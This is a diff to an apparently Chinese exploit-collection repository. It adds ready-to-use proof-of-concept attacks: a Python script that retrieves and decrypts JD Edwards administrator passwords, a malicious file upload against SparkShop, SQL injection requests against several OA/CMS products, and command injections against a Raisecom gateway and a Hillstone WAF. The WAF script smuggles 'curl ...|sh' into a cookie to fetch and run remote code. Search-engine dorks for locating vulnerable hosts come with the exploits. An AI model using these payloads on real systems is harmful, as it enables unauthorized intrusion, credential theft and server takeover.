240824更新漏洞

Oracle/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md

@@ -0,0 +1,122 @@
+# Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏
+
+Oracle JDEdwards EnterpriseOne Tools未授权获取管理员密码泄漏
+
+## shodan
+
+```yaml
+port:8999 product:"Oracle WebLogic Server"
+```
+
+## poc
+
+```java
+http://ip:8999/manage/fileDownloader?sec=1
+```
+
+![image-20240822225543738](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408222255786.png)
+
+```python
+import base64
+import argparse
+import subprocess
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import unpad
+
+def main():
+    # Display ASCII art
+    print("""
+       ______   ______    ___  ___  ___  ___      ___ ________ ____
+      / ___/ | / / __/___|_  |/ _ \|_  |/ _ \____|_  /_  /_  /|_  /
+     / /__ | |/ / _//___/ __// // / __// // /___/ __/ / //_ <_/_ < 
+     \___/ |___/___/   /____/\___/____/\___/   /____//_/____/____/ 
+    """)
+
+    # Parse command-line arguments
+    parser = argparse.ArgumentParser(description='Decrypt a given string.')
+    parser.add_argument('--string', help='The string to be decrypted')
+    parser.add_argument('--target', help='The target URL to fetch the string from')
+    args = parser.parse_args()
+
+    if args.target:
+        # Fetch the response from the target URL
+        response = fetch_target_string_with_curl(args.target)
+        if response:
+            input_str = response
+            print(f"Fetched string from target: {input_str}")
+        else:
+            print("No valid string found in the response.")
+            return
+    elif args.string:
+        input_str = args.string
+    else:
+        print("You must provide either --string or --target.")
+        return
+
+    # Decrypt the string
+    array_of_bytes = jde_decipher(input_str.encode("UTF-8"))
+    print("Decrypted string:", array_of_bytes.decode("UTF-8"))
+
+def fetch_target_string_with_curl(target_url):
+    try:
+        # Use curl to fetch the target URL with SSL verification disabled
+        result = subprocess.run(['curl', '-k', target_url], capture_output=True, text=True)
+        if result.returncode == 0:
+            response_text = result.stdout.strip()
+            print("Response received:")
+            print(response_text)  # Print for debugging
+            return response_text
+        else:
+            print(f"curl failed with return code {result.returncode}")
+            return None
+    except Exception as e:
+        print(f"Failed to fetch from target using curl: {e}")
+        return None
+
+def jde_decipher(param_array_of_bytes):
+    array_of_bytes_1 = show_buffer(param_array_of_bytes)
+    array_of_bytes_2 = base64.b64decode(array_of_bytes_1)
+    return array_of_bytes_2
+
+def show_buffer(param_array_of_bytes):
+    array_of_bytes_1 = bytearray(len(param_array_of_bytes) // 2)
+    for j in range(len(array_of_bytes_1)):
+        i = 2 * j
+        array_of_bytes_1[j] = ((param_array_of_bytes[i] - 65) << 4) + (param_array_of_bytes[i + 1] - 65)
+
+    if array_of_bytes_1[0] != 2:
+        raise Exception("Invalid version for net showBuffer")
+
+    array_of_bytes_2 = bytearray(16)
+    array_of_bytes_3 = bytearray(16)
+    gen_keys(array_of_bytes_2, array_of_bytes_3, array_of_bytes_1[3])
+
+    cipher = AES.new(array_of_bytes_2, AES.MODE_CBC, iv=array_of_bytes_3)
+    array_of_bytes_4 = unpad(cipher.decrypt(bytes(array_of_bytes_1[6:])), AES.block_size)
+
+    return array_of_bytes_4
+
+def gen_keys(param_array_of_bytes_1, param_array_of_bytes_2, param_byte):
+    array_of_bytes_1 = bytearray([65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46])
+    array_of_bytes_2 = bytearray([107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, 127, 77, 54])
+    array_of_bytes_3 = bytearray([36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56])
+
+    j = param_byte >> 4
+    k = param_byte & 0xF
+    m = array_of_bytes_3[j]
+    for i in range(16):
+        param_array_of_bytes_1[i] = array_of_bytes_1[i] ^ m
+
+    m = array_of_bytes_3[k]
+    for i in range(16):
+        param_array_of_bytes_2[i] = array_of_bytes_2[i] ^ m
+
+if __name__ == "__main__":
+    main()
+```
+
+```
+python3 poc.py --string ACHCJKFKHCJKKKJJIBBOCDPIHOEJIICHDGHGJEBABEAG
+```
+
+![image-20240822225618589](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408222256627.png)

README.md

@@ -1,12 +1,21 @@
 # 漏洞收集
 收集整理漏洞EXP/POC,大部分漏洞来源网络，目前收集整理了1000多个poc/exp，善用CTRL+F搜索
 
-## 2024.08.25 新增漏洞
-
-- 汇智ERP系统Upload.aspx存在文件上传漏洞
-- 超易企业管理系统Login.ashx存在SQL注入漏洞
-- 同享人力管理管理平台SFZService.asmx存在SQL注入漏洞
-- 九思OA接口WebServiceProxy存在XXE漏洞
+## 2024.08.24 新增漏洞
+
+- [汇智ERP系统Upload.aspx存在文件上传漏洞](./汇智ERP/汇智ERP系统Upload.aspx存在文件上传漏洞.md)
+- [超易企业管理系统Login.ashx存在SQL注入漏洞](./超易企业管理系统/超易企业管理系统Login.ashx存在SQL注入漏洞.md)
+- [同享人力管理管理平台SFZService.asmx存在SQL注入漏洞](./同享人力管理管理平台/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md)
+- [九思OA接口WebServiceProxy存在XXE漏洞](./九思OA/九思OA接口WebServiceProxy存在XXE漏洞.md)
+- [泛微ecology9系统接口ModeDateService存在SQL漏洞](./泛微OA/泛微ecology9系统接口ModeDateService存在SQL漏洞.md)
+- [Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏](./Oracle/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md)
+- [金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞](./金和OA/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md)
+- [瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞](./瑞斯康达/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md)
+- [南京星源图科技SparkShop存在任意文件上传漏洞](./南京星源图科技/南京星源图科技SparkShop存在任意文件上传漏洞.md)
+- [SeaCMS海洋影视管理系统index.php存在SQL注入漏洞](./海洋cms/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md)
+- [点企来客服系统getwaitnum存在sql注入漏洞](./点企来客服系统/点企来客服系统getwaitnum存在sql注入漏洞.md)
+- [山石网科应用防火墙WAF未授权命令注入漏洞](./山石网科云鉴/山石网科应用防火墙WAF未授权命令注入漏洞.md)
+- [用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞](./用友OA/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md)
 
 ## 2024.08.21 新增漏洞
 

南京星源图科技/南京星源图科技SparkShop存在任意文件上传漏洞.md

@@ -0,0 +1,44 @@
+# 南京星源图科技SparkShop存在任意文件上传漏洞
+
+南京星源图科技SparkShop商城存在任意文件上传漏洞，攻击者可获取服务器权限。
+
+## fofa
+
+```yaml
+"SparkShop"
+```
+
+## poc
+
+```java
+POST /api/Common/uploadFile HTTP/2
+Host: 
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "macOS"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Priority: u=0, i
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Length: 178
+
+------WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Disposition: form-data; name="file";filename="1.php"
+
+<?php echo"hello world";?>
+------WebKitFormBoundaryj7OlOPiiukkdktZR--
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/xrdAT9NE6Z5s7OoiJdnd-w

山石网科云鉴/山石网科应用防火墙WAF未授权命令注入漏洞.md

@@ -0,0 +1,45 @@
+# 山石网科应用防火墙WAF未授权命令注入漏洞
+
+山石网科 Web 应用防火墙（WAF）是专业智能的Web 应用安全防护产品，在Web资产发现、漏洞评估、流量学习、威胁定位等方面全面应用智能分析和语义分析技术，帮助用户轻松应对应用层风险，确保网站全天候的安全运营。
+
+在WAF的验证码页面，存在命令注入漏洞，恶意攻击者可通过构造恶意请求，拼接命令执行任意代码，控制服务器。
+
+**受影响版本:**
+5.5R6-2.6.7~5.5R6-2.8.13
+
+## fofa
+
+```yaml
+icon_hash="-839455805"
+```
+
+## poc
+
+```python
+import requests,sys
+requests.packages.urllib3.disable_warnings()
+session = requests.Session()
+
+target = "https://192.168.247.196/".strip("/")
+cmd="curl\x24{IFS}192.168.247.1:9999/cccc|sh"
+url = target+"/rest/captcha"
+headers = {"Accept":"*/*","User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Accept-Language":"en;q=0.9"}
+sss=requests.get(url,headers=headers,verify=False)
+
+if "PNG" not  in sss.content:
+    print("target not vuln")
+    sys.exit()
+
+
+
+
+cookies = {"PHPSESSID":"aaaaaaaaaa%3b"+cmd+"%3bd"}
+try:
+    response = session.get(target+"/rest/captcha", headers=headers, cookies=cookies,verify=False,timeout=5)
+except requests.exceptions.ReadTimeout:
+    print("payload work")
+    sys.exit()
+
+print("payload send!")
+```
+

泛微OA/泛微ecology9系统接口ModeDateService存在SQL漏洞.md

@@ -0,0 +1,52 @@
+# 泛微ecology9系统接口ModeDateService存在SQL漏洞
+
+泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology9系统ModeDateService存在SQL注入漏洞。
+
+## fofa
+
+```yaml
+app="泛微-协同商务系统"
+```
+
+## hunter
+
+```yaml
+app.name=="泛微 e-cology 9.0 OA"
+```
+
+## poc
+
+```java
+POST /services/ModeDateService HTTP/1.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Referer: http://xxx//services/Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz
+Connection: close
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: xxx 
+Content-Length: 405
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
+   <soapenv:Header/>   
+   <soapenv:Body>
+      <mod:getAllModeDataCount>
+		<mod:in0>1</mod:in0>         
+		<mod:in1>1</mod:in1>         
+		<mod:in2>1=1</mod:in2>         
+		<mod:in3>1</mod:in3>
+	  </mod:getAllModeDataCount>
+  </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![image-20240822185856455](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408221858526.png)
+
+![image-20240822185904629](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408221859693.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/2UkeRDbGaW0JGNQLfGSkRw

海洋cms/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md

@@ -0,0 +1,26 @@
+# SeaCMS海洋影视管理系统index.php存在SQL注入漏洞
+
+SeaCMS海洋影视管理系统index.php存在SQL注入漏洞，攻击者可获取数据库敏感数据。
+
+## fofa
+
+```yaml
+app="海洋CMS"
+```
+
+## poc
+
+```java
+POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 56
+
+cid=(select(1)from(select(sleep(6)))x)&text=1&color=1
+```
+

点企来客服系统/点企来客服系统getwaitnum存在sql注入漏洞.md

@@ -0,0 +1,32 @@
+# 点企来客服系统getwaitnum存在sql注入漏洞
+
+点企来客服系统getwaitnum存在sql注入漏洞，攻击者未经授权可以访问数据库中的数据，盗取用户的隐私以及个人信息，造成用户的信息泄露。
+
+## fofa
+
+```yaml
+body="layui-form-item" && body="/admin/login/check.html"
+```
+
+## poc
+
+```java
+POST /admin/event/getwaitnum HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: keep-alive
+Content-Length: 84
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate, br
+
+business_id[]=exp&business_id[]=+and+updatexml(1,concat(0x7e,md5(0x5c)),1)&groupid=1
+```
+
+![image-20240823213038237](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408232130305.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/unbf6JO5U9OAqdVq8YFbuQ

瑞斯康达/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md

@@ -0,0 +1,22 @@
+# 瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞
+
+瑞斯康达-多业务智能网关 list_service_manage.php 存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```yaml
+body="/images/raisecom/back.gif" && title=="Web user login"
+```
+
+## poc
+
+```java
+POST /vpn/list_service_manage.php?template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo29.php%60 HTTP/1.1
+Host: 
+Content-Length: 111
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+Nradius_submit=true
+```
+